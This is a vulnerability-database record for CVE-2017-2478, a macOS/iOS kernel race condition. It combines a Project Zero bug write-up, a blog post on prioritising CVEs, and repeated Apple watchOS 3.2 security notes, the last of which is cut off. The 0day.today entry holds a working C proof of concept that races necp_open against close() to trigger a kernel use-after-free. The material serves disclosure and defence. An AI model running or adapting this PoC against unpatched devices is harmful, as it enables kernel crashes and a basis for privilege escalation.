An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the "Kernel" component. A race condition allows attackers to execute arbitrary code in a privileged context via a crafted app.
{"seebug": [{"lastseen": "2017-11-19T12:00:17", "description": "necp_open is a syscall used to obtain a new necp file descriptor\n\nThe necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.\n\nHere's the relevant code from necp_open:\n\n`` error = falloc(p, &fp, &fd, vfs_context_current()); <\\--------------------- (a) if (error != 0) { goto done; }\n\nif ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP, M_WAITOK | M_ZERO)) == NULL) { error = ENOMEM; goto done; }\n\nfd_data->flags = uap->flags; LIST_INIT(&fd_data->clients); lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr); klist_init(&fd_data->si. si_note); fd_data->proc_pid = proc_pid(p);\n\nfp->f_fglob->fg_flag = FREAD; fp->f_fglob->fg_ops = &necp_fd_ops; fp->f_fglob->fg_data = fd_data; <\\-------------------------- (b)\n\nproc_fdlock(p);\n\n*fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE); procfdtbl_releasefd(p, fd, NULL); fp_drop(p, fd, fp, 1); proc_fdunlock(p); <\\--------------------- (c)\n\n*retval = fd;\n\nlck_rw_lock_exclusive(&necp_fd_lock); <\\---------------- (d) LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <\\------(e) lck_rw_done(&necp_fd_lock); ``\n\nat (a) a new file descriptor and file object is allocated for the calling process at (b) that the new file's fg_data is set to the fd_data heap allocation at (c) the process fd table is unlocked meaning that other processes can now look up the new fd and get the associated fp\n\nat (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list\n\nThe bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c) another thread can call close on the new fd which will free fd_data before we enqueue it at (e).\n\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2 \n\nAttachment: [necp_open. c](<https://bugs.chromium.org/p/project-zero/issues/attachment?aid=270104>)\n", "cvss3": {}, "published": "2017-04-04T00:00:00", "type": "seebug", "title": "MacOS/iOS kernel uaf due to bad locking in necp_open (CVE-2017-2478)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2478"], "modified": "2017-04-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92889", "id": "SSV:92889", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-13T20:37:03", "description": "Exploit for multiple platform in category dos / poc", "cvss3": {}, "published": "2017-04-04T00:00:00", "type": "zdt", "title": "macOS / iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-2478"], "modified": "2017-04-04T00:00:00", "id": "1337DAY-ID-27495", "href": "https://0day.today/exploit/description/27495", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=1116\r\n \r\nnecp_open is a syscall used to obtain a new necp file descriptor\r\n \r\nThe necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.\r\n \r\nHere's the relevant code from necp_open:\r\n \r\n error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a)\r\n if (error != 0) {\r\n goto done;\r\n }\r\n \r\n if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP,\r\n M_WAITOK | M_ZERO)) == NULL) {\r\n error = ENOMEM;\r\n goto done;\r\n }\r\n \r\n fd_data->flags = uap->flags;\r\n LIST_INIT(&fd_data->clients);\r\n lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr);\r\n klist_init(&fd_data->si.si_note);\r\n fd_data->proc_pid = proc_pid(p);\r\n \r\n fp->f_fglob->fg_flag = FREAD;\r\n fp->f_fglob->fg_ops = &necp_fd_ops;\r\n fp->f_fglob->fg_data = fd_data; <-------------------------- (b)\r\n \r\n proc_fdlock(p);\r\n \r\n *fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE);\r\n procfdtbl_releasefd(p, fd, NULL);\r\n fp_drop(p, fd, fp, 1);\r\n proc_fdunlock(p); <--------------------- (c)\r\n \r\n *retval = fd;\r\n \r\n lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d)\r\n LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e)\r\n lck_rw_done(&necp_fd_lock);\r\n \r\nat (a) a new file descriptor and file object is allocated for the calling process\r\nat (b) that new file's fg_data is set to the fd_data heap allocation\r\nat (c) the process fd table is unlocked meaning that other processes can now look up\r\n the new fd and get the associated fp\r\n \r\nat (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list\r\n \r\nThe bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c)\r\nanother thread can call close on the new fd which will free fd_data before we enqueue it at (e).\r\n \r\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2 \r\n \r\nin: \"...that other processes can now look up the new fd and get the associated fp...\" I meant threads, not processes!\r\n \r\n*/\r\n \r\n// ianbeer\r\n#if 0\r\nMacOS/iOS kernel uaf due to bad locking in necp_open\r\n \r\nnecp_open is a syscall used to obtain a new necp file descriptor\r\n \r\nThe necp file's fp's fg_data points to a struct necp_fd_data allocated on the heap.\r\n \r\nHere's the relevant code from necp_open:\r\n \r\n error = falloc(p, &fp, &fd, vfs_context_current()); <--------------------- (a)\r\n if (error != 0) {\r\n goto done;\r\n }\r\n \r\n if ((fd_data = _MALLOC(sizeof(struct necp_fd_data), M_NECP,\r\n M_WAITOK | M_ZERO)) == NULL) {\r\n error = ENOMEM;\r\n goto done;\r\n }\r\n \r\n fd_data->flags = uap->flags;\r\n LIST_INIT(&fd_data->clients);\r\n lck_mtx_init(&fd_data->fd_lock, necp_fd_mtx_grp, necp_fd_mtx_attr);\r\n klist_init(&fd_data->si.si_note);\r\n fd_data->proc_pid = proc_pid(p);\r\n \r\n fp->f_fglob->fg_flag = FREAD;\r\n fp->f_fglob->fg_ops = &necp_fd_ops;\r\n fp->f_fglob->fg_data = fd_data; <-------------------------- (b)\r\n \r\n proc_fdlock(p);\r\n \r\n *fdflags(p, fd) |= (UF_EXCLOSE | UF_FORKCLOSE);\r\n procfdtbl_releasefd(p, fd, NULL);\r\n fp_drop(p, fd, fp, 1);\r\n proc_fdunlock(p); <--------------------- (c)\r\n \r\n *retval = fd;\r\n \r\n lck_rw_lock_exclusive(&necp_fd_lock); <---------------- (d)\r\n LIST_INSERT_HEAD(&necp_fd_list, fd_data, chain); <------(e)\r\n lck_rw_done(&necp_fd_lock);\r\n \r\nat (a) a new file descriptor and file object is allocated for the calling process\r\nat (b) that new file's fg_data is set to the fd_data heap allocation\r\nat (c) the process fd table is unlocked meaning that other processes can now look up\r\n the new fd and get the associated fp\r\n \r\nat (d) the necp_fd_lock is taken then at (e) the fd_data is enqueued into the necp_fd_list\r\n \r\nThe bug is that the fd_data is owned by the fp so that after we drop the proc_fd lock at (c)\r\nanother thread can call close on the new fd which will free fd_data before we enqueue it at (e).\r\n \r\ntested on MacOS 10.12.3 (16D32) on MacbookAir5,2 \r\n#endif\r\n \r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <pthread.h>\r\n \r\n#include <sys/syscall.h>\r\n \r\nint necp_open(int flags) {\r\n return syscall(SYS_necp_open, flags);\r\n}\r\n \r\nvoid* closer(void* arg) {\r\n while(1) {\r\n close(3);\r\n }\r\n}\r\n \r\nint main() {\r\n for (int i = 0; i < 10; i++) {\r\n pthread_t t;\r\n pthread_create(&t, NULL, closer, NULL);\r\n }\r\n \r\n while (1) {\r\n int fd = necp_open(0);\r\n close(fd);\r\n }\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-03-13] #", "sourceHref": "https://0day.today/exploit/27495", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "avleonov": [{"lastseen": "2017-06-19T23:16:03", "description": "Hi everyone! Today I would like talk about software vulnerabilities. How to find really interesting vulnerabilities in the overall CVE flow. And how to do it automatically.\n\n\n\nFirst of all, let's talk why we may ever need to analyze software vulnerabilities? How people usually do their Vulnerability Management and Vulnerability Intelligence?\n\n\n\n * Some people have a Vulnerability scanner, scan infrastructure with it, patch founded vulnerabilities and think that this will be enough.\n * Some people pay attention to the vulnerabilities that are widely covered by media.\n * Some people use vulnerability databases and search for the most critical vulnerabilities by some criteria.\n\nEach of these ways have some advantages and some disadvantages.\n\n### Vulnerability Scanners\n\nHuge part of detection plugins were written manually. Especially plugins that work remotely without authorization. It takes time to make them and so they may appear in scanner with a huge latency. It also might be economically impractical for VM vendors to deal with vulnerabilities in some rare software.\n\n### Vulnerabilities, that are widely covered in media\n\nFrom the one hand it's really great. Even Top managers might ask you if we have, for example, GHOST in our infrastructure or other popular vulnerability. They begin to see that you are doing something important!\n\n\n\nOn the other hand, vulnerability researchers are also people. And they are interested in making more hype around the vulnerabilities they have discovered. It's just a part of their self-promotion. It's relatively easy to come with a name, register a domain and make a beautiful logo for the vulnerability. And it's hard to understand how critical this vulnerability really is. Especially when there are no so much details.\n\nHere you can see some well-known vulnerabilities that made a lot of noise in the past.\n\n\n\nMost of them were really critical. But, I have seen plenty of publications about BadLock saying that this vulnerability was overvalued.\n\n### Vulnerability databases and feeds\n\nMost people use CVSS vector and the CVSS Base Score for vulnerability filtering and vulnerability prioritization. They may also take into consideration the existence of exploits, for example. But the CVSS is still a basis.\n\nWhat is the Common Vulnerability Scoring System? In fact, there is a framework, a questionnaire, in which some person manually describes the vulnerability.\n\n\n\nI do not know who fills CVSS for National Vulnerability Database. But, imagine some people in US military uniform.\n\n\n\nThe final result is a score, number from 0 to 10, and a vector containing all the answers in a compact form.\n\nWhat's wrong with CVSS?\n\n * Filling the questionnaire is highly subjective procedure. You can easily make a mistake or just think differently during the classification.Or you may just have a controversial information about the vulnerability.\n * It takes time. That's why CVSS for the vulnerability appears in database much later than a human-readable description.\n * In NVD, for example, you can see only Base Score and Base Vector. And there is no Temporal Vector available.\n * CVSS model works well when we talk about desktops and servers and doesn't really fit for Internet of Things, for example.\n * CVSS is not well suited for confidentiality threats. A good example is the well-known Heartbleed.\n\nHeartbleed was rated as a medium-level vulnerability by NVD. But on the other hand, Tenable Network Security, the well-known Vulnerability Management vendor, believes that this vulnerability should have different CVSS vector.\n\n\n\nSo this is a controversial issue:\n\n * Confidentiality Impact is Complete or Partial?\n * Integrity Impact is None or Complete?\n\nAnd the final result depends on this.\n\nIt was the 2nd version of the CVSS standard, now the actual version is 3rd. But in 3rd versions problems with confidentiality threats were not solved either.\n\n### Vulnerability Quadrants\n\nSo, my idea was to evaluate vulnerabilities using the data that we currently have. Of course, it would be great to work with some highly formalized descriptions of vulnerabilities. However, as a rule, we do not have such information. We have only different objects linked with each other and stored in some vulnerability database.\n\nIf we open, for example, [Heartbleed page](<https://vulners.com/cve/CVE-2014-0160>) at [vulners.com](<https://vulners.com>) (read more about this service at \"[Vulners \u2013 Google for hacker](<https://avleonov.com/2016/07/23/vulners-google-for-hacker-how-the-best-vulnerability-search-engine-works-and-how-to-use-it/>)\") we can see all the objects linked to this vulnerability and the timestamps when objects were created.\n\n\n\nUsing this data I can calculate two integrated characteristics of vulnerability: \"Danger\" and \"Relevance\". And I can do it for any moment of time.\n\n**\"Danger\"** is about technical criticality and exploitability. It shows how interesting this vulnerability may be for an attacker.\n\nIt depends on:\n\n * CVSS Base Score \u2191\n * Potential exploitability \u2191\n * Exploits \u2191\n * Malware* \u2191\n * Patches \u2193\n * Detection plugins \u2193\n * Age \u2193\n\n**\"Relevance\"** shows the attention paid to the vulnerability by media, vulnerability management vendors, and users of vulnerability databases.\n\nIt depends on:\n\n * Media coverage \u2191\n * Descriptions \u2191\n * Detection plugins \u2191\n * Search queries* \u2191\n * Search results* \u2191 \n\n * Clicks* \u2191 \n\n * Age \u2193\n\n* haven't used it in PoC\n\nTo show the current state of vulnerability I use \"quadrants\". Like consulting and research companies do it for comparing software vendors.\n\n\n\n\n\nSo, for products \"Ability to execute\" and \"Completeness of vision\" are important, for vulnerabilities it will be \"Danger\" and \"Relevance\".\n\nI gave this names to quadrants:\n\n * Leading Threats\n * Local Disaster\n * Well-known Issue\n * Daily Routine\n\nHere is, for example, Vulnerability Quadrant for [Heartbleed](<https://vulners.com/cve/CVE-2014-0160>):\n\nAnd this one is for [Badlock](<https://vulners.com/cve/CVE-2016-2118>):\n\nAs you can see, unlike Heartbleed, Badlock was never a Leading Threat.\n\nWe can visualize more than one vulnerability at the same time. For example, here I took [last year CVEs](<https://vulners.com/search?query=type:cve%20last%20year>) and showed dynamics of their state since this beginning of the year (from 2017-01-01 till 2017-04-15).\n\nTo limit amount of the vulnerabilities in the lower left corner I made a \"rule for disappearing\": vulnerability may stay in Daily Routine quadrant only for 10 days with value of Danger and Relevance <3.5 or they will disappear.\n\nHere you can see different types of vulnerabilities. These ones are about [race condition that allows attackers to execute arbitrary code in a privileged context via a crafted app](<https://vulners.com/cve/CVE-2017-2478>). (iOS, macOS, tvOS, watchOS):\n\n\n\nAnd these vulnerabilities in Microsoft Edge and WordPress are also dangerous and exploitable, but never get the same level of media attention. Researchers find vulnerabilities in this products on a regular basis and therefore it's not a news. Vulnerabilities of such kind are slowly drifting from Local Disaster quadrant to Daily Routine.\n\n\n\nOf course, \"rule for disappearing\" doesn't work in real life and all vulnerabilities will exist in your infrastructure until you install the updates. If I switch off this rule and switch off all the captions, we will see something like this:\n\nSo, don't forget to fix vulnerabilities in your systems until it's too late:\n\n\n\nThe Greedy Raja covered with golden coins. From the classic Soviet animated film [Golden Antelope](<https://www.youtube.com/watch?v=wpSAJOyLfU8>)\n\nVulnerability Quadrant is a simple and universal way to show the current state for any vulnerability and dynamics of this state. it's possible to highlight most critical vulnerabilities and to identify trends. And it's just fun to watch vulnerabilities crawling on the screen. \n\nProblems and limitations \n- It\u2019s all about CVEs. And we all know, that some vulnerabilities may have multiple CVEs and some may don't have CVEs at all, for example vulnerabilities in SAP products. And they are out of scope right now. \n- Formulas for Danger and Relevance are very subjective. Basically, what factors you choose, such values you will get. However, when you use the same formulas for all vulnerabilities the overall picture remains the same. \n- We can make this instrument much more effective, but we need more information about exploits, malware, statistics and search history from vulnerability databases and so on.\n\n**Q:** Can we use Vulnerability Quadrants to decide which of vulnerabilities are really dangerous for your organization and should be discovered and patched immediately?\n\nWell, yes, but not in the form we have seen earlier. First of all, we should switch off gravity. Vulnerability Danger will not become smaller until you patch the software in your organization. As well as Relevance. And you should consider only vulnerabilities in the software products that are currently in use in your organization.\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-05-09T21:17:36", "title": "Vulnerability Quadrants", "type": "avleonov", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2118", "CVE-2014-0160", "CVE-2017-2478"], "modified": "2017-05-09T21:17:36", "id": "AVLEONOV:B5CA8049524C96A911991EE8ADF24F64", "href": "http://feedproxy.google.com/~r/avleonov/~3/nMNWzQgosww/", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "apple": [{"lastseen": "2020-12-24T20:41:17", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 3.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: an anonymous researcher, Isaac Archambault of IDAoADI\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HTTPProtocol**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**libarchive**\n\nAvailable for: All Apple Watch models\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: All Apple Watch models\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: All Apple Watch models\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-04-04T03:34:42", "title": "About the security content of watchOS 3.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2461", "CVE-2017-2450", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2379", "CVE-2017-2428", "CVE-2017-2471", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2451", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2472", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2458", "CVE-2017-2401", "CVE-2017-2467", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2416", "CVE-2017-2440", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-04-04T03:34:42", "id": "APPLE:HT207602", "href": "https://support.apple.com/kb/HT207602", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-10T17:00:50", "description": "# About the security content of watchOS 3.2\n\nThis document describes the security content of watchOS 3.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## watchOS 3.2\n\nReleased March 27, 2017\n\n**Audio**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department, John Villamil, Doyensec\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing a maliciously crafted font may result in the disclosure 